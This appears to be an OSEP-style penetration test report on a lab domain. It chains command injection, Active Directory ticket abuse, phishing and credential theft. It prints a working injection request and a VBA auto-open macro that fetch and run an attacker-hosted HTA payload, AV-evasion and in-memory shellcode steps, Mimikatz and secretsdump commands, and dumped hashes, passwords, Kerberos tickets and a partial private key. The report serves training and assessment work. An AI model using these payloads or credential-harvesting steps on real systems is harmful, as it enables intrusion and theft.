Penetration Testing Report - OSEP

Executive Summary

This comprehensive report documents a simulated penetration test aimed at assessing the security posture of JJSTUDIO’s corporate network. The primary objective was to gain access to the segmented file server VAULT01, which contains proprietary information from the research and development department. The test emulated a sophisticated adversarial attack that strategically utilized multiple cycles of lateral movement and privilege escalation. Various attack techniques aligning with the MITRE ATT&CK framework were employed, each meticulously chosen to exploit specific vulnerabilities within the network.

Key findings revealed several high-risk vulnerabilities, leading to successive breaches and escalations within the network infrastructure, culminating in complete control over the domain controller and a vault file server. The report concludes with targeted recommendations to fortify the network’s defenses, enhance detection capabilities, and minimize the overall attack surface.

Key Findings

Stage	Target Service	Technique	CVSS Score	Impact
1	WEB07	Initial access via publicly exposed git repository	7.8 (High)	Initial Access
2	WEB05	Initial access via command injection	7.8 (High)	Initial Access
3	WEB05	Privilege escalation via PrintSpoofer	8.0 (High)	Privilege Escalation
4	FILE02	Lateral movement using S4U2Self/S4U2Proxy abuse	8.5 (High)	Lateral Movement
5	CLIENT01	Initial access via malicious email	7.0 (High)	Initial Access
6	CLIENT01	Privilege escalation via Rubeus	8.0 (High)	Privilege Escalation
7	CLIENT01	Credential theft using KeePass Database decryption	8.5 (High)	Credential Theft
8	VAULT02	Initial access via SSH login with Michael Adams’ creds	8.0 (High)	Initial Access
9	VAULT02	Initial access via SSH private key login	8.0 (High)	Initial Access
10	VAULT02	Privilege escalation using Ansible Vault	9.0 (Critical)	Privilege Escalation
11	VAULT02	Lateral movement using Ansible Ad-hoc command	9.0 (Critical)	Lateral Movement
12	DB05	Credential theft via TGT Extraction	8.5 (High)	Credential Theft
13	JUMP09	Initial access via TGT of rhys.lucas	8.5 (High)	Initial Access
14	VAULT01	Initial access via reverse shell on Evil-winrm session	8.0 (High)	Initial Access
15	WEB07 (Part 2)	Initial access via CVE-2021-22205 - GitLab Exploit	7.8 (High)	Initial Access
16	WEB07 (Part 2)	Privilege escalation via Sudo	8.0 (High)	Privilege Escalation
17	SRV01	Initial access via SSH using Cracked Private Key	7.5 (High)	Initial Access
18	SRV01	Privilege escalation via Local Administrator Hash	8.5 (High)	Privilege Escalation

Attack Flow and Narrative

Stage 1: Initial Access

• Target System: WEB07
• Technique: Publicly exposed git repository (T1213)
• Details: Gained initial access by finding credentials for dev01 in a publicly accessible git commit.
• CVSS Score: 7.8 (High)
• Credentials:
  • Username: dev01
  • Password: J2bmNa5uAhVMGG

Stage 2: Initial Access

• Target System: WEB05
• Technique: Command injection (T1059.003)
• Details: Used the credentials obtained from WEB07 to log into WEB05. Accessed a download page and analyzed the JavaScript code to identify how license keys are generated, leading to the discovery of a command injection vulnerability.
• CVSS Score: 7.8 (High)

Stage 3: Privilege Escalation

• Target System: WEB05
• Technique: PrintSpoofer (T1068)
• Details: Escalated privileges from IIS APPPOOL\DefaultAppPool to SYSTEM using PrintSpoofer.
• CVSS Score: 8.0 (High)

Stage 4: Lateral Movement

• Target System: FILE02
• Technique: S4U2Self/S4U2Proxy Abuse (T1550.004)
• Details: Checked WEB05 for special privileges in the internal network using BloodHound. Found that WEB05 can act on behalf of other identities for FILE02. Created a service ticket for rhys.lucas to move laterally to FILE02.
• CVSS Score: 8.5 (High)

Stage 5: Initial Access

• Target System: CLIENT01
• Technique: Malicious Email (T1193)
• Details: Sent a malicious email to gain initial access on CLIENT01.
• CVSS Score: 7.0 (High)

Stage 6: Privilege Escalation

• Target System: CLIENT01
• Technique: Rubeus (T1098)
• Details: Escalated privileges on CLIENT01 using a Kerberos ticket obtained with Rubeus.
• CVSS Score: 8.0 (High)

Stage 7: Credential Theft and Lateral Movement

• Target System: CLIENT01
• Technique: KeePass Database (KDBX) file decryption
• Details: Obtained a KeePass database (KDBX) file on CLIENT01, decrypted it to find an SSH private key for VAULT02.
  • Credentials:
    • Found SSH private key in the KDBX file.

Stage 8: Initial Access to VAULT02

• Target System: VAULT02
• Technique: SSH login with Michael Adams’ credentials
• Details: Used the credentials obtained from previous machine exploitation to log into VAULT02 as michael.adams.
  • User: michael.adams
  • Password: [REDACTED]
  • Found user details in the home directory to determine the appropriate user for the SSH private key.

Stage 9: Initial Access as vault user on VAULT02

• Target System: VAULT02
• Technique: SSH private key login
• Details: Used the SSH private key found in the KDBX file to log into VAULT02 as the vault user.

Stage 10: Privilege Escalation using Ansible Vault

• Target System: VAULT02
• Technique: Ansible Vault (T1003.005)
• Details: Decrypted an Ansible vault file to obtain credentials and escalate privileges.
• CVSS Score: 9.0 (Critical)

Stage 11: Lateral movement using Ansible Ad-hoc Commond

• Target System: VAULT02
• Technique: Ansible Ad-hoc command execution
• Details: Found an Ansible playbook file on VAULT02 and used an adhoc Ansible command to execute a reverse shell on DB05 as the root user.
• CVSS Score: 9.0 (Critical)

Stage 12: Credential Theft on DB05

• Target System: DB05
• Technique: TGT (Ticket Granting Ticket) Extraction
• Details: Found the TGT of rhys.lucas in the /tmp directory on DB05.

Stage 13: Initial Access to JUMP09

• Target System: JUMP09
• Technique: Using TGT of rhys.lucas
• Details: Used the TGT of rhys.lucas to gain access to JUMP09.
• CVSS Score: 8.5 (High)

Stage 13: Initial Access to VAULT01

• Target System: VAULT01
• Technique: Reverse shell (T1059.001)
• Details: Achieved a foothold on VAULT01 using a reverse shell on an Evil-winrm session, leveraging the local administrator password found on JUMP09.
• CVSS Score: 8.0 (High)

Stage 14: Initial Access to WEB07 (Part 2)

• Target System: WEB07
• Technique: CVE-2021-22205 - GitLab Exploit
• Details: Enumerated the WEB07 machine and identified GitLab version 13.10 as vulnerable. Used the CVE-2021-22205 exploit to change the password of the root user on GitLab, gaining access with the new password (P4ss@GitLab). Further enumeration of the repositories revealed a monitor.sh file containing credentials for the monitor user.
• Credentials:
  • Username: monitor
  • Password: EcoStar9
• CVSS Score: 7.8 (High)

Stage 15: Privilege Escalation on WEB07

• Target System: WEB07
• Technique: Sudo Privilege Escalation
• Details: Used SSH to log in as the monitor user and found that the user was in the sudo group. Escalated privileges to root using sudo su.
• CVSS Score: 8.0 (High)

Stage 16: Initial Access to SRV01

• Target System: SRV01
• Technique: SSH using Cracked Private Key
• Details: Found an encrypted private key for ricky.davies in the .ssh directory on WEB07. Cracked the passphrase (Sunshine1) using John the Ripper and used the key to log into SRV01.
• Credentials:
  • Username: ricky.davies
  • Passphrase: Sunshine1
• CVSS Score: 7.5 (High)

Stage 17: Privilege Escalation on SRV01

• Target System: SRV01
• Technique: Local Administrator Hash
• Details: Retrieved the NTLM hash for the Administrator account and used it to execute a reverse shell via Sliver C2.
• Credentials:
  • Username: Administrator
  • NTLM Hash: 9bca25d429b0cee9bce72dc3eaceb791
• CVSS Score: 8.5 (High)

Detailed Findings

At the start of this external black box penetration testing, only two IP’s which were exposed to the Internet are provided.

Machine Name	IP	Domain
WEB05	192.168.118.103	jijistudio.com
WEB07	192.168.118.110	dev.jijistudio.com

External Enumeration

The testing started by enumerating the IP’s using nmap to find out the services running on the systems and possible attack vectors.

sudo nmap -sC -sV -T4 -p- -oA 192.168.118.103 192.168.118.103

sudo nmap -sC -sV -T4 -p- -oA 192.168.118.110 192.168.118.110

192.168.118.110 (WEB07) PART - 1

The nmap scan showed 3 open ports on the machine WEB07

Port	Service	Version
22	ssh	OpenSSH 8.2p1 Ubuntu 4ubuntu0.4
80	http	nginx
443	https	closed
2222	ssh	OpenSSH 8.2p1 Ubuntu 4ubuntu0.2

After enumerating the the machine on port 80, some interesting information was found by visiting http://192.168.118.110/root/downloader/-/commit/021bf56946cfcc69978beeb11e999d7e23aa8b8f?view=inline .

{width=70%}

It was a git commit to remove the secrets from the code base which were publicly accessible to an unauthenticated user.

The secrets found were the login credentials for user dev01 for the machine web05.

Username	Password
dev01	J2bmNa5uAhVMGG

This secrets are then used to further enumerate web05.

192.168.118.103 / 172.16.118.102 (WEB05)

The nmap scan showed 6 ports open on the machine WEB05.

Port	Service	Version
80	http	Microsoft IIS httpd 10.0
135	msrpc	Microsoft Windows RPC
139	netbios-ssn	Microsoft Windows netbios-ssn
445	microsoft-ds?
5985	http	Microsoft HTTPAPI httpd 2.0
49668	msrpc	Microsoft Windows RPC

Enumerating the machine by visiting the website gave a page to login as shown in the figure below.

{width=70%}

The credentials obtained from the previous enumeration gave us the access to Download Page where a user can download the licences for the games purchased by the user.

{width=70%}

After looking into the page source a javascirpt code snippet was found with uses a legacy executable to generate the license key.

{width=70%}

Carefully looking into how the scripts works gave a possible attack vector for command injection.

The following GET request was used to get Remote Code Execution (RCE) on web05 and getting initial foothold into the jijistudio network.

Burp request for Initial foothold

GET /Internal/GetKeys?u='dev01';mshta.exe+http://192.168.49.118/sliver64.hta;&g= HTTP/1.1
Host: web05.jijistudio.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://web05.jijistudio.com/Internal/Downloads
Cookie: ASP.NET_SessionId=a542olz5lw0dqpzxbydrqbdf

The above request executes a sliver64.hta file using mshta.exe which then gives the reverse shell on Sliver Command and Control framework.

All the payloads generated during this penetration testing assignments can be found in the resource development part in Appendix Section.

After getting the initial foothold the first local.txt flag was found as shown below.

local.txt (WEB05)

d6d13c257060e13ba57a3d7e9b545a4b

As the shell obtained from the initial exploit was as ISS APPPOOL/DefaultAppPool user which had SeImpersonatePrivilege enabled the privilege escalation was straight forward.

Privilege Escalation

First of all a shellcode runner executable was uploaded on the machine using sliver.

upload sph.exe

As most of the traditional AV could detect and remove executables like PrintSpoofer64.exe. It was converted to shellcode using donut with necessary arguments.

 
./donut -i /home/jay/osep/challenge6/resources_development/PrintSpoofer64.exe -a 2 -b 2 -o /tmp/payload.bin -p '-c c:\windows\tasks\shp.exe'
 

Once the shellcode file was generated a new sacrificial process is executed which will run the shellcode.

execute notepad.exe

The pid of he notepad.exe is obtained with the following command.

ps -e notepad

Once the pid was obtained the the shellcode was executed in memory using sliver.

execute-shellcode -p 3604 /tmp/payload.bin

After few minutes a new sessions was obtained on Sliver C2 as System and the proof.txt was obtained from the machine.

proof.txt (WEB05)

83431f8eea0d6b1202145c4e20597c34

Post exploitation/Host Recon

Credential Theft using SAM and SYSTEM

The following two commands were used to save the system and sam from registry.

execute -o cmd /c "reg save HKLM\system system"

execute -o cmd /c "reg save HKLM\sam sam"

Once the files were saved on the web05 machine it was downloaded to local machine using sliver.

download sam

download system

The sam passwords were then obtained using impacket’s secretsdump script.

secretsdump.py -system system -sam sam LOCAL

Loot

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5728e3184eda0cac9fede716b5f1576b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6876517bc5ab4ab821983c0f0cab1792:::

Credential Theft using Mimikatz

 mimikatz "sekurlsa::logonpasswords"

Loot

Hash of web05 machine account

99abb6fddbfb52c5655c3723f6959733

Bloodhound Enumeration

We first upload the sharphound collector on the web05 machine.

upload SharpHound.exe

Executing sharphound and download the zip file.

./SharpHound.exe -c All

download 20240629195119_BloodHound.zip

And lastly we will setup Ligogo proxy to gain access to internal network.

ligolo setup

On Client Machine

sudo ip tuntap add user jay mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.118.0/24 dev ligolo
./proxy -selfcert -laddr 10.10.15.57:4443

On WEB05 Machine

execute agent.exe -connect 10.10.15.207:8443 --ignore-cert

Internal Enumeration

As we have already pawned the WEB05 machine, we first start by checking if this machine has any special privileges in the internal network.

We mark the machine as owned and check the Shortest Path from Owned Principals from Bloodhound analysis tab.

The Bloodhound help menu describe this attribute as following:

“The computer WEB05.JIJISTUDIO.COM is added to the msds-AllowedToActOnBehalfOfOtherIdentity attribute on the computer FILE02.JIJISTUDIO.COM.”

“An attacker can use this account to execute a modified S4U2self/S4U2proxy abuse chain to impersonate any domain user to the target computer system and receive a valid service ticket as this user.”

Based on the description we try to find the user we want to impersonate as on File02. We again use bloodhound for this.

From the following graph we see that user “Rhys.Lucas” is member of Domain Admins group so we will try to impersonate this user.

Before we try to impersonate the user on File02 machine, we first need to find what IP File02 has.

We use nxc to scan the entire 172.16.118.0/24 IP range using smb and ssh protocol so that we don’t miss the linux machines as most of the time linux machines have ssh port open and with we can find all the machines.

nxc smb 172.16.118.0/24

nxc ssh 172.16.118.0/24

After properly formatting the output of two commands above, we end up with following list of machines which we add into our /etc/hosts file.

172.16.118.104 (FILE02)

Port	Service	Version
135	msrpc	Microsoft Windows RPC
139	netbios-ssn	Microsoft Windows netbios-ssn
445	microsoft-ds?

Based on our enumeration so far, we start by requesting TGS for FILE02 machine using rubues s4u flag as RHYS.LUCAS user.

rubeus s4u /user:WEB05$ /rc4:99abb6fddbfb52c5655c3723f6959733 /impersonateuser:rhys.lucas /msdsspn:HOST/file02.jijistudio.com /nowrap

We then convert the obtained TGS in kirbi and ccache format so that we can use this on our kali machine. To do this we used a python script RubeusToCcache

../../tools/RubeusToCcache/rubeustoccache.py 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 rhys_lucas.kirbi rhys_lucas.ccache

We then export then ccache file using the following command on the kali host

export KRB5CCNAME=rhys_lucas.ccache

Once the ccache file is exported we use nxc to execute our shellcode runner hta file.

Initial foothold on FILE02

nxc smb 172.16.118.104 --use-kcache -x 'mshta.exe http://192.168.49.118/sliver64.hta'

The shellcode runner hta file calls the staged payload on port 8446 but on FILE02 this port was blocked so we also created stager-listener on port 8080.

As the user Rhys.Lucas belongs to the Domain Admin group we get the administrator shell and we don’t need to perform privilege escalation.

Proof.txt (FILE02)

94d7e3dc25d1137dafd7a09835bb9074

Post exploitation/Host Recon

Credential Theft using Mimikatz

mimikatz "sekurlsa::logonpasswords"

mimikatz "lsadump::sam"

Loot

Hash of File02 machine account

 ca2576c3154827e2528d20b46b907822

Hash of Local Administrator

User : Administrator
Hash NTLM: 79af9fa167a034b456e0f20d5b17d490

Manual Enumeration

On manually Enumerating the FILE02 Host, we found an interesting file named mail.eml with the following content.

From michael.adams@jijistudio.com
Return-Path: <michael.adams@jijistudio.com>
Received: from michael by xxx with SMTP id <xxx> for <michael.adams@jijistudio.com>; Wed, 01 May 2022 18:38:20 +1000
Date: Wed, 01 May 2022 18:38:20 +1000
From: Michael Adams <michael.adams@jijistudio.com>
To: Tracy <tracy.kelly@jijistudio.com>
Message-Id: <xxx>
Subject: Game Manual Review
 
Hello Tracy,
 
 
please send me the updated game manual as a .docx file so I can add some comments. Thank you!
 
Best,
Michael - IT
 

Here the user Michael Adams who belongs to IT group asks user Tracy Kelly to send him an email as .docx.

Based on this information, if we could send a malicious docx file as an email to user Michael, we might get a shell as Michael on the system he opens the file on.

172.16.118.105 (MAIL01) PART - 1

Enumeration

Based on our enumeration on FILE02, we start enumeration MAIL01 as SMTP might be running on the server and we may be able to use it for sending email to Michael.Adams.

sudo nmap -sC -sV -T4 -p- -oA 172.16.118.105 172.16.118.105

The nmap result gives us 5 open ports on the machine and hMailServer is running on port 25.

We also have port 445 open so we first start with checking if we have access to any shares using the hash of WEB05 machine.

Port	Service	Version
25	smtp	hMailServer smtpd
135	msrpc	Microsoft Windows RPC
139	netbios-ssn	Microsoft Windows netbios-ssn
445	microsoft-ds?
49668	msrpc	Microsoft Windows RPC

Check Share Access

nxc smb 172.16.118.105 -u 'WEB05$' -H 99abb6fddbfb52c5655c3723f6959733 --shares

Based on the output above we have Read,Write access to attachments. So maybe we could directly upload out attachment on the share.

Accessing the Share

We use smbclient.py to access the share as WEB05.

smbclient.py 'jijistudio.com/WEB05$'@MAIL01.jijistudio.com -hashes 99abb6fddbfb52c5655c3723f6959733:99abb6fddbfb52c5655c3723f6959733

use attachments

Uploading the malicious dotm file

put resume4.dotm

We used a attachments share and uploaded out malicious resume4.dotm file on the share.

The email asked for .docx file but to keep it simple we first start with dotm file which are macro enable files.

Microsoft doesn’t allows to attach macro in .docx file. There are still ways around it but it’s worth a try to upload dotm first. If it doesn’t works we will need dotm file anyways to create macro enabled docx file.

The Macro in the dotm file is shown below.

Sub MyMacro()

    Dim str2 As String

    str2 = "mshta.exe http://192.168.49.118/sliver64.hta"
    Shell str2, vbHide
End Sub
Sub Document_Open()
    MyMacro
End Sub
Sub AutoOpen()
    MyMacro
End Sub

After waiting few minutes we indeed got a shell but not on MAIL01 rather on Client01. We will come back to this machine later in the report.

172.16.118.106 (CLIENT01)

sudo nmap -sC -sV -T4 -p- -oA 172.16.118.105 172.16.118.105

We already got a initial foothold on the machine Client01 but it’s still a good practice to enumerate the machine.

Port	Service	Version
135	msrpc?
139	netbios-ssn?
445	microsoft-ds?
3389	ms-wbt-server	Microsoft Terminal Services - smb2-time: - date: 2024-06-30T05:24:21 - rdp-ntlm-info: - ssl-cert: Subject: commonName=client01.jijistudio.com - Target_Name: JIJISTUDIO - DNS_Tree_Name: jijistudio.com - DNS_Domain_Name: jijistudio.com - DNS_Computer_Name: client01.jijistudio.com - Product_Version: 10.0.19041 - NetBIOS_Domain_Name: JIJISTUDIO - smb2-security-mode: - Not valid before: 2024-06-28T20:20:58 - 3: 1:1: - NetBIOS_Computer_Name: CLIENT01

Initial Foothold on CLIENT01

After getting the initial foothold the first local.txt flag was found as shown below.

local.txt (CLIENT01)

22dc1b6627f457149b8650fbb90d86d3

Host Recon

We check first if user Michael.Adams belongs to local Administrator group.

net localgroup Administrators

The user is in the Administrator group but the shell we obtained is running in medium Mandatory Level

Privilege Escalation

The easiest way to do privilege escalation is as follows

We first get the TGT of user Michael.Adams using Rubeus.

 rubeus tgtdeleg /service:krbtgt /nowrap

We then convert the TGT in kirbit and **ccache ** format like we did earlier.

../../tools/RubeusToCcache/rubeustoccache.py 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 michael_Adams.kirbi Michael_Adams.ccache

We then export the **ccache ** file into the session.

export KRB5CCNAME=Michael_Adams.ccache

As we already know that the user Michael.Adams is a local Administrator we can try to dump the sam and lsa database using nxc.

Credential Theft using NXC

nxc smb 172.16.118.106 --use-kcache --sam

Loot

Hash of Local Administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ea8cef3cd8d4a8d866bc1436ff63e45b:::

nxc smb 172.16.118.106 --use-kcache --lsa

Hash of CLIENT01 and Clear text Password of Michael.Adams

JIJISTUDIO\CLIENT01$:aad3b435b51404eeaad3b435b51404ee:cd184cf8823e5ad7d88e1f01a44dfdd0:::

jijistudio.com\michael.adams:H0x7TxfKBmf+iV

RDP to CLIENT01 using the clear text password

xfreerdp /u:michael.adams /p:H0x7TxfKBmf+iV /v:172.16.118.106

We then open the Powershell as Administrator.

And the we execute our shellcode runner.

After executing the shellcode runner, we get a shell on out Sliver C2 and we obtain the proof.txt file.

Proof.txt (CLIENT01)

837a69c2fe89e2c2ceb66e92bba229b4

Post exploitation/Host Recon

Along side the proof.txt we found a Password.kdbx file which is a keepass file.

We download the file on to our local system and try to crack the password to access the file.

download Passwords.kdbx

cp Passwords.kdbx try.kdbx

keepass2john try.kdbx > try.txt

john --wordlist=rockyou.txt try.txt

As we already have a RDP session on the Machine we try to open the file with KeePassXC app on the machine using the password.

After unlocking the file we got ssh private key for VAULT02 machine.

SSH private key for Vault02 machine

-----BEGIN OPENSSH PRIVATE KEY-----
 
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcnNhAAAAAwEAAQAAAYEAzEMTEzLaZNDuSx6KazI9xZExvC1dqjLNhJMqlll4aMLILDvmYp1goxPPJMy526PRj5vJniVX6ZoOeSnSQD7KY0Wkx051N/DVSVX7cZ4dycMn1HrV44Pvz4LLx7AUTvA00XQIICwEu71hKkubo9MHfGxCgegzUuKF2+wXbCiiytN5GLOEvBRRG/kn689dPU+5aLFn4s80XUl83tlXyHdgmpuM0Pr/wJPJThwg2zYdvO65oVuRU+T4qh/2l3o18OJL2LVa7nMsJIHFvITnu3Go0ECHGDMDi5HY6NJ2PsYDz5Vm+9igQ4Y5A/pPLFqYfBnZjFfEDu5e+mAesQHF1radlc5urfvM7UMN4YsLh4NgGXkEURmcLjvCiSDYbnZG1TqDtwvIQsfZ0LrklLB6DodN9RkePm2hv896xgS2HL/VuNbVAmosjrxfFs/oEcyuVhQUdEKnQ/wh08B7cfhBJyU/jaCSPLI5g2lt/7834WOlfolZw/5rzZ/a4LkTihXKqT43AAAFiI/rRG+P60RvAAAAB3NzaC1yc2EAAAGBAMxDExMy2mTQ7kseimsyPcWRMbwtXaoyzYSTKpZZeGjCyCw75mKdYKMTzyTMuduj0Y+byZ4lV+maDnkp0kA+ymNFpMdOdTfw1UlV+3GeHcnDJ9R61eOD78+Cy8ewFE7wNNF0CCAsBLu9YSpLm6PTB3xsQoHoM1LihdvsF2woosrTeRizhLwUURv5J+vPXT1PuWixZ+LPNF1JfN7ZV8h3YJqbjND6/8CTyU4cINs2HbzuuaFbkVPk+Kof9pd6NfDiS9i1Wu5zLCSBxbyE57txqNBAhxgzA4uR2OjSdj7GA8+VZvvYoEOGOQP6TyxamHwZ2YxXxA7uXvpgHrEBxda2nZXObq37zO1DDeGLC4eDYBl5BFEZnC47wokg2G52RtU6g7cLyELH2dC65JSweg6HTfUZHj5tob/PesYEthy/1bjW1QJqLI68XxbP6BHMrlYUFHRCp0P8IdPAe3H4QSclP42gkjyyOYNpbf+/N+FjpX6JWcP+a82f2uC5E4oVyqk+NwAAAAMBAAEAAAGAS0m90inATcCk1JNhObm/Av9NcarXB1DKZ79GxzwbIaIJ3iQF+vs/D1zR0SKUrtxm9aPaYKwrBzN9ejNsB7odJxIYdk347r